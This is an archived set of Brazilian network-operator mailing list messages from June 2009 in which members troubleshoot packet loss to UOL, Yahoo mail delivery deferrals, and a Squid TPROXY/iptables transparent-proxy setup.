?https://eng.registro.br/mailman/listinfo/gter > From frederick at dahype.org Mon Jun 29 10:20:44 2009 From: frederick at dahype.org (Renato Frederick) Date: Mon, 29 Jun 2009 09:20:44 -0400 Subject: [GTER] RES: Problemas com o UOL? In-Reply-To: <724d72960906290530k111a1d86sb07dd7150f64e2dc@mail.gmail.com> References: <64265.189.71.37.238.1246205518.squirrel@187.45.84.2> <276fbe8b0906281823k110c876dk80414908164f9259@mail.gmail.com> <724d72960906290530k111a1d86sb07dd7150f64e2dc@mail.gmail.com> Message-ID: Bloco 187 e tambem tudo OK, mas estou usando diveo. > -----Mensagem original----- > De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] > Em nome de Renato de Oliveira Diogo > Enviada em: segunda-feira, 29 de junho de 2009 09:31 > Para: Grupo de Trabalho de Engenharia e Operacao de Redes > Assunto: Re: [GTER] Problemas com o UOL? > > Pela Telefonica, tamb?m est? sem problemas. > > Por?m daqui n?o ? bloco 187. > > Atenciosamente > ________________________________________________ > Renato de Oliveira Diogo > > Bacharel em Ci?ncia da Computa??o > UNESP - Bauru > > LPIC1 - Linux Professional Institute Certification - N?vel 1 > > renato.diogo at gmail.com > renato.diogo at yahoo.com.br > > > > 2009/6/28 Gustavo Santos : > > perfeito via Oi > > > > 2009/6/28 casfre at gmail.com > > > >> Ol?, > >> > >> > Algum dos srs est? com problemas de conectividade ao UOL? > >> > Vejam este trace, a perda no border router deles > >> > > >> > ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? Packets ? ? ? ? ? ? ? Pings > >> > ?Host ? ? ? ? ? ? ? ? ? ? ? ? Loss% ? Snt ? Last ? Avg ?Best ?Wrst > StDev > >> > (...) > >> > ?5. 200.184.193.147 ? ? ? ? ? ?0.0% ? ?21 ? 51.4 ?54.6 ?50.7 116.3 > ?14.1 > >> > ?6. ??? > >> > ?7. fr1-border2.ix.uol.com.br 85.0% ? ?21 ? 52.9 ?53.3 ?51.8 ?55.2 > ? 1.7 > >> > ?8. 200.221.30.174 ? ? ? ? ? ?60.0% ? ?21 ? 51.7 ?55.2 ?51.7 ?64.8 > ? 4.5 > >> > ?9. home.uol.com.br ? ? ? ? ? 85.0% ? ?21 ? 61.7 ?56.0 ?52.3 ?61.7 > ? 5.0 > >> > >> ? ?Sem perdas aqui. ADSL, CTBC. > >> > >> ? Obrigado. > >> > >> C?ssio > >> -- > >> gter list ? ?https://eng.registro.br/mailman/listinfo/gter > >> > > -- > > gter list ? ?https://eng.registro.br/mailman/listinfo/gter > > > -- > gter list https://eng.registro.br/mailman/listinfo/gter From andre at ibtelecom.net.br Mon Jun 29 08:22:30 2009 From: andre at ibtelecom.net.br (andre at ibtelecom.net.br) Date: Mon, 29 Jun 2009 11:22:30 +0000 Subject: [GTER] Res: Re: Problemas com o UOL? Message-ID: <1372033686-1246274670-cardhu_decombobulator_blackberry.rim.net-549337917-@bxe1207.bisx.prod.on.blackberry> temos intelig e h? 15 dias notamos problemas abrimos chamado falamos com a uol e nada. ------Mensagem original------ De: Bruno Cabral Remetente: gter-bounces at eng.registro.br Para: Grupo de Trabalho de Engenharia e Operacao de Redes Responder a: Grupo de Trabalho de Engenharia e Operacao de Redes Assunto: Re: [GTER] Problemas com o UOL? Enviada: Jun 28, 2009 22:38 > Nenhum problema pela OI. > N?o ser? algo no link UOL x INTELIG ? Isso produziria o problema > que voc? v? mas n?o afetaria clientes que entrassem via OI ou Telefonica. A origem ? um bloco 187, ser? que ? isso? Tem algu?m do UOL aqui? []s, !3runo Cabral -- gter list https://eng.registro.br/mailman/listinfo/gter Enviado atrav?s do meu BlackBerry? da Nextel From renato.diogo at gmail.com Mon Jun 29 11:02:24 2009 From: renato.diogo at gmail.com (Renato de Oliveira Diogo) Date: Mon, 29 Jun 2009 11:02:24 -0300 Subject: [GTER] Dominio yahoo In-Reply-To: References: <724d72960906260715m71a9d0c9qdf4527ac7e317a97@mail.gmail.com> Message-ID: <724d72960906290702l347d02aajb117de34f8b26c89@mail.gmail.com> Creio que o problema n?o seja esse. Pois pelo que pesquisei na lista MASOCH-L a implementa??o foi em 2004. E tenho este servidor funcionando sem problemas desde 2006. Segue abaixo uma pequena lista de erros que retirei dos logs: === (qmail-send) @400000004a48af161e6a7214 delivery 46838: deferral: Sorry,_I_wasn't_able_to_establish_an_SMTP_connection._(#4.4.1)/ @400000004a48af4c309362fc delivery 46853: deferral: Connected_to_67.195.168.31_but_connection_died._(#4.4.2)/ @400000004a48afc0087eb884 delivery 46880: deferral: Sorry,_I_wasn't_able_to_establish_an_SMTP_connection._(#4.4.1)/ @400000004a48b4c20093c614 delivery 46909: deferral: Connected_to_216.39.53.1_but_connection_died._(#4.4.2)/ @400000004a48b0192ca803b4 delivery 46910: deferral: Sorry,_I_wasn't_able_to_establish_an_SMTP_connection._(#4.4.1)/ @400000004a48b041129b4c4c delivery 46911: deferral: Connected_to_67.195.168.31_but_connection_died._(#4.4.2)/ @400000004a48b6100307e6dc delivery 47022: deferral: Connected_to_216.39.53.2_but_connection_died._(#4.4.2)/ @400000004a48b62535e14bfc delivery 47430: deferral: Sorry,_I_wasn't_able_to_establish_an_SMTP_connection._(#4.4.1)/ @400000004a48b6152367398c delivery 47035: deferral: Connected_to_206.190.53.191_but_connection_died._(#4.4.2)/ @400000004a48baf92a85d764 delivery 47439: deferral: Connected_to_216.39.53.3_but_connection_died._(#4.4.2)/ @400000004a48b189107f3a7c delivery 47041: deferral: Connected_to_66.196.82.7_but_connection_died._(#4.4.2)/ @400000004a48b63f1fdeb2f4 delivery 47064: deferral: Connected_to_209.191.118.103_but_connection_died._(#4.4.2)/ === Tenho um outro servidor com a mesma estrutura (s? que em outra cidade) que n?o est? apresentando o mesmo problema. Testei conectividade via ping, traceroute e telnet e est? tudo ok... n?o estou conseguindo localizar o problema. Alguma ideia a mais? Grato ________________________________________________ Renato de Oliveira Diogo Bacharel em Ci?ncia da Computa??o UNESP - Bauru LPIC1 - Linux Professional Institute Certification - N?vel 1 renato.diogo at gmail.com renato.diogo at yahoo.com.br 2009/6/26 Sergio Ricardo Marques : > Aqui carregando estranhamente MUITO r?pido tanto como V?rtua, como com o > Speedy. > Teste de e-mail ok. Saiu e chegou r?pido. > > Abra?os. > > Sergio. > > > ----- Original Message ----- From: "Renato de Oliveira Diogo" > > To: "Grupo de Trabalho de Engenharia e Operacao de Redes" > > Sent: Friday, June 26, 2009 11:15 AM > Subject: [GTER] Dominio yahoo > > > Senhores > bom dia > > alguem est? tendo dificuldades de acessar os dom?nios do yahoo? > > Na minha fila de e-mail todos os e-mail do yahoo est?o parados para entrega. > Os sites n?o est?o sendo carregados (aparece o nome do site na barra > de t?tulo, mas o site n?o carrega). > > Atenciosamente > ________________________________________________ > Renato de Oliveira Diogo > > Bacharel em Ci?ncia da Computa??o > UNESP - Bauru > > LPIC1 - Linux Professional Institute Certification - N?vel 1 > > renato.diogo at gmail.com > renato.diogo at yahoo.com.br > -- > gter list ? ?https://eng.registro.br/mailman/listinfo/gter > -- > gter list ? ?https://eng.registro.br/mailman/listinfo/gter > From welisson at conectcor.com.br Mon Jun 29 11:49:15 2009 From: welisson at conectcor.com.br (Welisson) Date: Mon, 29 Jun 2009 11:49:15 -0300 Subject: [GTER] Problemas com Tproxy Message-ID: <4A48D46B.4050107@conectcor.com.br> Bom dia a todos Galera gostaria de um auxilio de voc?s, na seguinte situa??o. Tenho um server rodando com proxy squid em modo transparente, por?m o que ocorre ? o seguinte, preciso fazer com que as solicita??es com destino a porta 80 seja redirecionada para esse servidor proxy cujo o qual est? habilitado o tproxy, e em perfeito funcionamento quando essa maquina passa ser o gateway da rede... Criei um ambiente testes com as seguintes caracteristicas, maquina 1 Debian 5 Etch kernel 2.6.19 (recompilado), fazendo o redirecionamento da seguinte maneira abaixo iptables -t tproxy -A PREROUTING -s 189.1xx.xxx.2 -p TCP --dport 80 -j TPROXY --on-ip 189.4xx.xxx.10 --on-port 3128 Ele redireciona normalmente, por?m ocorre o seguinte erro abaixo 2009/06/29 11:38:09| tproxy ip=189.1xx.xxx.2,0x2a07fbd,port=0 ERROR ASSIGN Pensando que poderia ser algum problema de patch, coloquei tal maquina como gw e o tproxy funcionou perfeitamente. No entanto na maquina 1 fiz simplesmente uma regra de DNAT redirecionando as solicita??es com destino a porta 80 para a maquina 2 (Debina 5 Etch, kernel 2.6.19, CacheBoy 1.5.2, tentei com o squid tamb?m e ocorre o mesmo problema) Exemplo digitado na maquina 1 iptables -t nat -A PREROUTING -s 189.1xx.xxx.xx2 -p TCP --dport 80 -j DNAT --to-destination 189.4xx.xxx.10 Maquina 2 iptables -t tproxy -A PREROUTING -s 189.1xx.xxx.2 -p TCP --dport 80 -j TPROXY --on-port 3128 Nessa situa??o n?o a navega??o, pois as solicita??es d?o timeout no squid. Situa??o descrita abaixo Esta??o 1 <------> Gateway<------>Internet | Todas as solicita??es da esta??o 1 com destino a | porta 80 ? redirecionada para o proxy. Proxy Agrade?o desde j?. -- Welisson From cleber-listas at inetweb.com.br Mon Jun 29 11:27:10 2009 From: cleber-listas at inetweb.com.br (Cleber - Listas) Date: Mon, 29 Jun 2009 11:27:10 -0300 Subject: [GTER] RES: Dominio yahoo In-Reply-To: <724d72960906290702l347d02aajb117de34f8b26c89@mail.gmail.com> References: <724d72960906260715m71a9d0c9qdf4527ac7e317a97@mail.gmail.com> <724d72960906290702l347d02aajb117de34f8b26c89@mail.gmail.com> Message-ID: Renato, Pode ser algo entre seu IP e o destino no Yahoo. Se mudar o IP de saida o mesmo problema ocorre? Se ocorrer, pode ser algo de rota ou conectividade de sua origem com o yahoo. Outra recomenda??o mesmo ? enviar um e-mail para o Yahoo via formulario (http://help.yahoo.com/l/us/yahoo/mail/postmaster/) e ver no que lhe ajudam. Abra?os, Cleber -----Mensagem original----- De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] Em nome de Renato de Oliveira Diogo Enviada em: segunda-feira, 29 de junho de 2009 11:02 Para: Grupo de Trabalho de Engenharia e Operacao de Redes Assunto: Re: [GTER] Dominio yahoo Creio que o problema n?o seja esse. Pois pelo que pesquisei na lista MASOCH-L a implementa??o foi em 2004. E tenho este servidor funcionando sem problemas desde 2006. Segue abaixo uma pequena lista de erros que retirei dos logs: === (qmail-send) @400000004a48af161e6a7214 delivery 46838: deferral: Sorry,_I_wasn't_able_to_establish_an_SMTP_connection._(#4.4.1)/ @400000004a48af4c309362fc delivery 46853: deferral: Connected_to_67.195.168.31_but_connection_died._(#4.4.2)/ @400000004a48afc0087eb884 delivery 46880: deferral: Sorry,_I_wasn't_able_to_establish_an_SMTP_connection._(#4.4.1)/ @400000004a48b4c20093c614 delivery 46909: deferral: Connected_to_216.39.53.1_but_connection_died._(#4.4.2)/ @400000004a48b0192ca803b4 delivery 46910: deferral: Sorry,_I_wasn't_able_to_establish_an_SMTP_connection._(#4.4.1)/ @400000004a48b041129b4c4c delivery 46911: deferral: Connected_to_67.195.168.31_but_connection_died._(#4.4.2)/ @400000004a48b6100307e6dc delivery 47022: deferral: Connected_to_216.39.53.2_but_connection_died._(#4.4.2)/ @400000004a48b62535e14bfc delivery 47430: deferral: Sorry,_I_wasn't_able_to_establish_an_SMTP_connection._(#4.4.1)/ @400000004a48b6152367398c delivery 47035: deferral: Connected_to_206.190.53.191_but_connection_died._(#4.4.2)/ @400000004a48baf92a85d764 delivery 47439: deferral: Connected_to_216.39.53.3_but_connection_died._(#4.4.2)/ @400000004a48b189107f3a7c delivery 47041: deferral: Connected_to_66.196.82.7_but_connection_died._(#4.4.2)/ @400000004a48b63f1fdeb2f4 delivery 47064: deferral: Connected_to_209.191.118.103_but_connection_died._(#4.4.2)/ === Tenho um outro servidor com a mesma estrutura (s? que em outra cidade) que n?o est? apresentando o mesmo problema. Testei conectividade via ping, traceroute e telnet e est? tudo ok... n?o estou conseguindo localizar o problema. Alguma ideia a mais? Grato ________________________________________________ Renato de Oliveira Diogo Bacharel em Ci?ncia da Computa??o UNESP - Bauru LPIC1 - Linux Professional Institute Certification - N?vel 1 renato.diogo at gmail.com renato.diogo at yahoo.com.br 2009/6/26 Sergio Ricardo Marques : > Aqui carregando estranhamente MUITO r?pido tanto como V?rtua, como com > o Speedy. > Teste de e-mail ok. Saiu e chegou r?pido. > > Abra?os. > > Sergio. > > > ----- Original Message ----- From: "Renato de Oliveira Diogo" > > To: "Grupo de Trabalho de Engenharia e Operacao de Redes" > > Sent: Friday, June 26, 2009 11:15 AM > Subject: [GTER] Dominio yahoo > > > Senhores > bom dia > > alguem est? tendo dificuldades de acessar os dom?nios do yahoo? > > Na minha fila de e-mail todos os e-mail do yahoo est?o parados para entrega. > Os sites n?o est?o sendo carregados (aparece o nome do site na barra > de t?tulo, mas o site n?o carrega). > > Atenciosamente > ________________________________________________ > Renato de Oliveira Diogo > > Bacharel em Ci?ncia da Computa??o > UNESP - Bauru > > LPIC1 - Linux Professional Institute Certification - N?vel 1 > > renato.diogo at gmail.com > renato.diogo at yahoo.com.br > -- > gter list ? ?https://eng.registro.br/mailman/listinfo/gter > -- > gter list ? ?https://eng.registro.br/mailman/listinfo/gter > -- gter list https://eng.registro.br/mailman/listinfo/gter Verificado por AVG - www.avgbrasil.com.br Vers?o: 8.5.375 / Banco de dados de v?rus: 270.12.94/2208 - Data de Lan?amento: 06/29/09 05:54:00 From renato.ornelas at gmail.com Mon Jun 29 11:33:02 2009 From: renato.ornelas at gmail.com (Renato Ornelas) Date: Mon, 29 Jun 2009 11:33:02 -0300 Subject: [GTER] Res: Re: Problemas com o UOL? In-Reply-To: <1372033686-1246274670-cardhu_decombobulator_blackberry.rim.net-549337917-@bxe1207.bisx.prod.on.blackberry> References: <1372033686-1246274670-cardhu_decombobulator_blackberry.rim.net-549337917-@bxe1207.bisx.prod.on.blackberry> Message-ID: Eu saio pela CTBC e tenho reclama??es tamb?m... Downloads do mirrors.uol oscilam bastante, por exemplo. Renato Ornelas 2009/6/29 > temos intelig e h? 15 dias notamos problemas abrimos chamado falamos com a > uol e nada. > ------Mensagem original------ > De: Bruno Cabral > Remetente: gter-bounces at eng.registro.br > Para: Grupo de Trabalho de Engenharia e Operacao de Redes > Responder a: Grupo de Trabalho de Engenharia e Operacao de Redes > Assunto: Re: [GTER] Problemas com o UOL? > Enviada: Jun 28, 2009 22:38 > > > Nenhum problema pela OI. > > N?o ser? algo no link UOL x INTELIG ? Isso produziria o problema > > que voc? v? mas n?o afetaria clientes que entrassem via OI ou Telefonica. > > A origem ? um bloco 187, ser? que ? isso? > > Tem algu?m do UOL aqui? > > []s, !3runo Cabral > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > > > Enviado atrav?s do meu BlackBerry? da Nextel > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From stuntshell at gmail.com Mon Jun 29 11:58:26 2009 From: stuntshell at gmail.com (Jean Rousseau Franco) Date: Mon, 29 Jun 2009 11:58:26 -0300 Subject: [GTER] Dominio yahoo In-Reply-To: <724d72960906290702l347d02aajb117de34f8b26c89@mail.gmail.com> References: <724d72960906260715m71a9d0c9qdf4527ac7e317a97@mail.gmail.com> <724d72960906290702l347d02aajb117de34f8b26c89@mail.gmail.com> Message-ID: Renato, Yahoo tem um jeito pr?prio de bloquear spam. Eu ia sugerir que utilizasse seu outro servidor para fazer envio, mas lendo mais atentamente a mensagem vc diz que nem as p?ginas carregam? 2009/6/29 Renato de Oliveira Diogo > Creio que o problema n?o seja esse. Pois pelo que pesquisei na lista > MASOCH-L a implementa??o foi em 2004. E tenho este servidor > funcionando sem problemas desde 2006. > Segue abaixo uma pequena lista de erros que retirei dos logs: > === (qmail-send) > @400000004a48af161e6a7214 delivery 46838: deferral: > Sorry,_I_wasn't_able_to_establish_an_SMTP_connection._(#4.4.1)/ > @400000004a48af4c309362fc delivery 46853: deferral: > Connected_to_67.195.168.31_but_connection_died._(#4.4.2)/ > @400000004a48afc0087eb884 delivery 46880: deferral: > Sorry,_I_wasn't_able_to_establish_an_SMTP_connection._(#4.4.1)/ > @400000004a48b4c20093c614 delivery 46909: deferral: > Connected_to_216.39.53.1_but_connection_died._(#4.4.2)/ > @400000004a48b0192ca803b4 delivery 46910: deferral: > Sorry,_I_wasn't_able_to_establish_an_SMTP_connection._(#4.4.1)/ > @400000004a48b041129b4c4c delivery 46911: deferral: > Connected_to_67.195.168.31_but_connection_died._(#4.4.2)/ > @400000004a48b6100307e6dc delivery 47022: deferral: > Connected_to_216.39.53.2_but_connection_died._(#4.4.2)/ > @400000004a48b62535e14bfc delivery 47430: deferral: > Sorry,_I_wasn't_able_to_establish_an_SMTP_connection._(#4.4.1)/ > @400000004a48b6152367398c delivery 47035: deferral: > Connected_to_206.190.53.191_but_connection_died._(#4.4.2)/ > @400000004a48baf92a85d764 delivery 47439: deferral: > Connected_to_216.39.53.3_but_connection_died._(#4.4.2)/ > @400000004a48b189107f3a7c delivery 47041: deferral: > Connected_to_66.196.82.7_but_connection_died._(#4.4.2)/ > @400000004a48b63f1fdeb2f4 delivery 47064: deferral: > Connected_to_209.191.118.103_but_connection_died._(#4.4.2)/ > === > > Tenho um outro servidor com a mesma estrutura (s? que em outra cidade) > que n?o est? apresentando o mesmo problema. > > Testei conectividade via ping, traceroute e telnet e est? tudo ok... > n?o estou conseguindo localizar o problema. > > Alguma ideia a mais? > > Grato > ________________________________________________ > Renato de Oliveira Diogo > > Bacharel em Ci?ncia da Computa??o > UNESP - Bauru > > LPIC1 - Linux Professional Institute Certification - N?vel 1 > > renato.diogo at gmail.com > renato.diogo at yahoo.com.br > > > > 2009/6/26 Sergio Ricardo Marques : > > Aqui carregando estranhamente MUITO r?pido tanto como V?rtua, como com o > > Speedy. > > Teste de e-mail ok. Saiu e chegou r?pido. > > > > Abra?os. > > > > Sergio. > > > > > > ----- Original Message ----- From: "Renato de Oliveira Diogo" > > > > To: "Grupo de Trabalho de Engenharia e Operacao de Redes" > > > > Sent: Friday, June 26, 2009 11:15 AM > > Subject: [GTER] Dominio yahoo > > > > > > Senhores > > bom dia > > > > alguem est? tendo dificuldades de acessar os dom?nios do yahoo? > > > > Na minha fila de e-mail todos os e-mail do yahoo est?o parados para > entrega. > > Os sites n?o est?o sendo carregados (aparece o nome do site na barra > > de t?tulo, mas o site n?o carrega). > > > > Atenciosamente > > ________________________________________________ > > Renato de Oliveira Diogo > > > > Bacharel em Ci?ncia da Computa??o > > UNESP - Bauru > > > > LPIC1 - Linux Professional Institute Certification - N?vel 1 > > > > renato.diogo at gmail.com > > renato.diogo at yahoo.com.br > > -- > > gter list https://eng.registro.br/mailman/listinfo/gter > > -- > > gter list https://eng.registro.br/mailman/listinfo/gter > > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From ce.langoni at gmail.com Mon Jun 29 12:11:10 2009 From: ce.langoni at gmail.com (Carlos Eduardo Langoni) Date: Mon, 29 Jun 2009 12:11:10 -0300 Subject: [GTER] Problemas com Tproxy In-Reply-To: <4A48D46B.4050107@conectcor.com.br> References: <4A48D46B.4050107@conectcor.com.br> Message-ID: <8aa07a210906290811x75ad46edrf6082195d36720d8@mail.gmail.com> Welisson, Por que usar o TPROXY? Tem alguma finalidade espec?fica? Voc? pode usar o DNAT direto e ao inv?s de jogar da porta 80 da maquina 1 para porta 80 da m?quina 2 e na maquina dois jogar da porta 80 par 3128, jogar da porta 80 da m?quina 1 direto para 3128 da m?quina dois, o que seria o mais correto. iptables -t nat -A PREROUTING -s 189.1xx.xxx.xx2 -p TCP --dport 80 -j DNAT --to-destination 189.4xx.xxx.10:3128 isso j? resolveria seu problema. Se o proxy estiver na mesma m?quina do gateway vc usaria -j REDIRECT --to-port 3128 Qualquer coisa diz aih Kadu 2009/6/29 Welisson : > Bom dia a todos > > > Galera gostaria de um auxilio de voc?s, na seguinte situa??o. > Tenho um server rodando com proxy squid em modo transparente, por?m o que > ocorre ? o seguinte, preciso fazer com que as solicita??es com destino a > porta 80 seja redirecionada para esse servidor proxy cujo o qual est? > habilitado o tproxy, e em perfeito funcionamento quando essa maquina passa > ser o gateway da rede... > Criei um ambiente testes com as seguintes caracteristicas, maquina 1 Debian > 5 Etch kernel 2.6.19 (recompilado), fazendo o redirecionamento da seguinte > maneira abaixo > iptables -t tproxy -A PREROUTING -s 189.1xx.xxx.2 -p TCP --dport 80 -j > TPROXY --on-ip 189.4xx.xxx.10 --on-port 3128 > > Ele redireciona normalmente, por?m ocorre o seguinte erro abaixo > > 2009/06/29 11:38:09| tproxy ip=189.1xx.xxx.2,0x2a07fbd,port=0 ERROR ASSIGN > > Pensando que poderia ser algum problema de patch, coloquei tal maquina como > gw e o tproxy funcionou perfeitamente. > > No entanto na maquina 1 fiz simplesmente uma regra de DNAT redirecionando as > solicita??es com destino a porta 80 para a maquina 2 (Debina 5 Etch, kernel > 2.6.19, CacheBoy 1.5.2, tentei com o squid tamb?m e ocorre o mesmo problema) > Exemplo digitado na maquina 1 > iptables -t nat -A PREROUTING -s 189.1xx.xxx.xx2 -p TCP --dport 80 -j DNAT > --to-destination 189.4xx.xxx.10 > > Maquina 2 > iptables -t tproxy -A PREROUTING -s 189.1xx.xxx.2 -p TCP --dport 80 -j > TPROXY --on-port 3128 > > Nessa situa??o n?o a navega??o, pois as solicita??es d?o timeout no squid. > > Situa??o descrita abaixo > > > Esta??o 1 <------> Gateway<------>Internet > ? ? ? ? ? ? ? ? ? ?| Todas as solicita??es da esta??o 1 com destino a > ? ? ? ? ? ? ? ? ? ?| porta 80 ? redirecionada para o proxy. > ? ? ? ? ? ? ? ? ?Proxy > > > Agrade?o desde j?. > > -- > Welisson > -- > gter list ? ?https://eng.registro.br/mailman/listinfo/gter > From welisson at conectcor.com.br Mon Jun 29 14:29:20 2009 From: welisson at conectcor.com.br (Welisson) Date: Mon, 29 Jun 2009 14:29:20 -0300 Subject: [GTER] Problemas com Tproxy Message-ID: <4A48F9F0.4030301@conectcor.com.br> Sim, poderia ser feito dessa maneira. Por?m o que ocorre ? o seguinte, a necessidade de utiliza??o do tproxy ? justamente para manter os endere?os ip's dos clientes, para n?o ser "mascarado" pelo ip do proxy. -- Welisson From eschoedler at viavale.com.br Mon Jun 29 14:43:46 2009 From: eschoedler at viavale.com.br (Eduardo Schoedler) Date: Mon, 29 Jun 2009 14:43:46 -0300 Subject: [GTER] Problemas com Tproxy References: <4A48D46B.4050107@conectcor.com.br> Message-ID: <9307FA2E375143A89EAA9EBF8B8C5269@admgaz.com.br> Ol? Welisson. O tproxy n?o possui muita documenta??o. Existe uma lista de discuss?o: https://lists.balabit.hu/mailman/listinfo/tproxy Abra?o, Eduardo. ----- Original Message ----- From: "Welisson" To: Sent: Monday, June 29, 2009 11:49 AM Subject: [GTER] Problemas com Tproxy Bom dia a todos Galera gostaria de um auxilio de voc?s, na seguinte situa??o. Tenho um server rodando com proxy squid em modo transparente, por?m o que ocorre ? o seguinte, preciso fazer com que as solicita??es com destino a porta 80 seja redirecionada para esse servidor proxy cujo o qual est? habilitado o tproxy, e em perfeito funcionamento quando essa maquina passa ser o gateway da rede... Criei um ambiente testes com as seguintes caracteristicas, maquina 1 Debian 5 Etch kernel 2.6.19 (recompilado), fazendo o redirecionamento da seguinte maneira abaixo iptables -t tproxy -A PREROUTING -s 189.1xx.xxx.2 -p TCP --dport 80 -j TPROXY --on-ip 189.4xx.xxx.10 --on-port 3128 Ele redireciona normalmente, por?m ocorre o seguinte erro abaixo 2009/06/29 11:38:09| tproxy ip=189.1xx.xxx.2,0x2a07fbd,port=0 ERROR ASSIGN Pensando que poderia ser algum problema de patch, coloquei tal maquina como gw e o tproxy funcionou perfeitamente. No entanto na maquina 1 fiz simplesmente uma regra de DNAT redirecionando as solicita??es com destino a porta 80 para a maquina 2 (Debina 5 Etch, kernel 2.6.19, CacheBoy 1.5.2, tentei com o squid tamb?m e ocorre o mesmo problema) Exemplo digitado na maquina 1 iptables -t nat -A PREROUTING -s 189.1xx.xxx.xx2 -p TCP --dport 80 -j DNAT --to-destination 189.4xx.xxx.10 Maquina 2 iptables -t tproxy -A PREROUTING -s 189.1xx.xxx.2 -p TCP --dport 80 -j TPROXY --on-port 3128 Nessa situa??o n?o a navega??o, pois as solicita??es d?o timeout no squid. Situa??o descrita abaixo Esta??o 1 <------> Gateway<------>Internet | Todas as solicita??es da esta??o 1 com destino a | porta 80 ? redirecionada para o proxy. Proxy Agrade?o desde j?. -- Welisson -- gter list https://eng.registro.br/mailman/listinfo/gter From renato.diogo at gmail.com Mon Jun 29 15:08:11 2009 From: renato.diogo at gmail.com (Renato de Oliveira Diogo) Date: Mon, 29 Jun 2009 15:08:11 -0300 Subject: [GTER] Dominio yahoo In-Reply-To: References: <724d72960906260715m71a9d0c9qdf4527ac7e317a97@mail.gmail.com> <724d72960906290702l347d02aajb117de34f8b26c89@mail.gmail.com> Message-ID: <724d72960906291108h61fc42a5le571fb74f5c8d5@mail.gmail.com> Oi Jean, em rela??o quando enviei o primeiro e-mail realmente as p?ginas n?o abriam mesmo. Por?m no mesmo dia as p?ginas voltaram a carregar, tendo o problema agora somente o e-mail. Atenciosamente ________________________________________________ Renato de Oliveira Diogo Bacharel em Ci?ncia da Computa??o UNESP - Bauru LPIC1 - Linux Professional Institute Certification - N?vel 1 renato.diogo at gmail.com renato.diogo at yahoo.com.br 2009/6/29 Jean Rousseau Franco : > Renato, > Yahoo tem um jeito pr?prio de bloquear spam. > Eu ia sugerir que utilizasse seu outro servidor para fazer envio, mas lendo > mais atentamente a mensagem vc diz que nem as p?ginas carregam? > > 2009/6/29 Renato de Oliveira Diogo > >> Creio que o problema n?o seja esse. Pois pelo que pesquisei na lista >> MASOCH-L a implementa??o foi em 2004. E tenho este servidor >> funcionando sem problemas desde 2006. >> Segue abaixo uma pequena lista de erros que retirei dos logs: >> === (qmail-send) >> @400000004a48af161e6a7214 delivery 46838: deferral: >> Sorry,_I_wasn't_able_to_establish_an_SMTP_connection._(#4.4.1)/ >> @400000004a48af4c309362fc delivery 46853: deferral: >> Connected_to_67.195.168.31_but_connection_died._(#4.4.2)/ >> @400000004a48afc0087eb884 delivery 46880: deferral: >> Sorry,_I_wasn't_able_to_establish_an_SMTP_connection._(#4.4.1)/ >> @400000004a48b4c20093c614 delivery 46909: deferral: >> Connected_to_216.39.53.1_but_connection_died._(#4.4.2)/ >> @400000004a48b0192ca803b4 delivery 46910: deferral: >> Sorry,_I_wasn't_able_to_establish_an_SMTP_connection._(#4.4.1)/ >> @400000004a48b041129b4c4c delivery 46911: deferral: >> Connected_to_67.195.168.31_but_connection_died._(#4.4.2)/ >> @400000004a48b6100307e6dc delivery 47022: deferral: >> Connected_to_216.39.53.2_but_connection_died._(#4.4.2)/ >> @400000004a48b62535e14bfc delivery 47430: deferral: >> Sorry,_I_wasn't_able_to_establish_an_SMTP_connection._(#4.4.1)/ >> @400000004a48b6152367398c delivery 47035: deferral: >> Connected_to_206.190.53.191_but_connection_died._(#4.4.2)/ >> @400000004a48baf92a85d764 delivery 47439: deferral: >> Connected_to_216.39.53.3_but_connection_died._(#4.4.2)/ >> @400000004a48b189107f3a7c delivery 47041: deferral: >> Connected_to_66.196.82.7_but_connection_died._(#4.4.2)/ >> @400000004a48b63f1fdeb2f4 delivery 47064: deferral: >> Connected_to_209.191.118.103_but_connection_died._(#4.4.2)/ >> === >> >> Tenho um outro servidor com a mesma estrutura (s? que em outra cidade) >> que n?o est? apresentando o mesmo problema. >> >> Testei conectividade via ping, traceroute e telnet e est? tudo ok... >> n?o estou conseguindo localizar o problema. >> >> Alguma ideia a mais? >> >> Grato >> ________________________________________________ >> Renato de Oliveira Diogo >> >> Bacharel em Ci?ncia da Computa??o >> UNESP - Bauru >> >> LPIC1 - Linux Professional Institute Certification - N?vel 1 >> >> renato.diogo at gmail.com >> renato.diogo at yahoo.com.br >> >> >> >> 2009/6/26 Sergio Ricardo Marques : >> > Aqui carregando estranhamente MUITO r?pido tanto como V?rtua, como com o >> > Speedy. >> > Teste de e-mail ok. Saiu e chegou r?pido. >> > >> > Abra?os. >> > >> > Sergio. >> > >> > >> > ----- Original Message ----- From: "Renato de Oliveira Diogo" >> > >> > To: "Grupo de Trabalho de Engenharia e Operacao de Redes" >> > >> > Sent: Friday, June 26, 2009 11:15 AM >> > Subject: [GTER] Dominio yahoo >> > >> > >> > Senhores >> > bom dia >> > >> > alguem est? tendo dificuldades de acessar os dom?nios do yahoo? >> > >> > Na minha fila de e-mail todos os e-mail do yahoo est?o parados para >> entrega. >> > Os sites n?o est?o sendo carregados (aparece o nome do site na barra >> > de t?tulo, mas o site n?o carrega). >> > >> > Atenciosamente >> > ________________________________________________ >> > Renato de Oliveira Diogo >> > >> > Bacharel em Ci?ncia da Computa??o >> > UNESP - Bauru >> > >> > LPIC1 - Linux Professional Institute Certification - N?vel 1 >> > >> > renato.diogo at gmail.com >> > renato.diogo at yahoo.com.br >> > -- >> > gter list ? ?https://eng.registro.br/mailman/listinfo/gter >> > -- >> > gter list ? ?https://eng.registro.br/mailman/listinfo/gter >> > >> -- >> gter list ? ?https://eng.registro.br/mailman/listinfo/gter >> > -- > gter list ? ?https://eng.registro.br/mailman/listinfo/gter > From rejaine at bhz.jamef.com.br Mon Jun 29 15:15:39 2009 From: rejaine at bhz.jamef.com.br (Rejaine Monteiro) Date: Mon, 29 Jun 2009 15:15:39 -0300 Subject: [GTER] problemas telefonica? Message-ID: <4A4904CB.5040704@bhz.jamef.com.br> algu?m mais est? com problemas em sao paulo (capital) para fazer liga??es ddd pela telefonica? From bruno at anid.com.br Mon Jun 29 15:26:54 2009 From: bruno at anid.com.br (Bruno Cabral) Date: Mon, 29 Jun 2009 15:26:54 -0300 (BRT) Subject: [GTER] Res: Re: Problemas com o UOL? In-Reply-To: References: 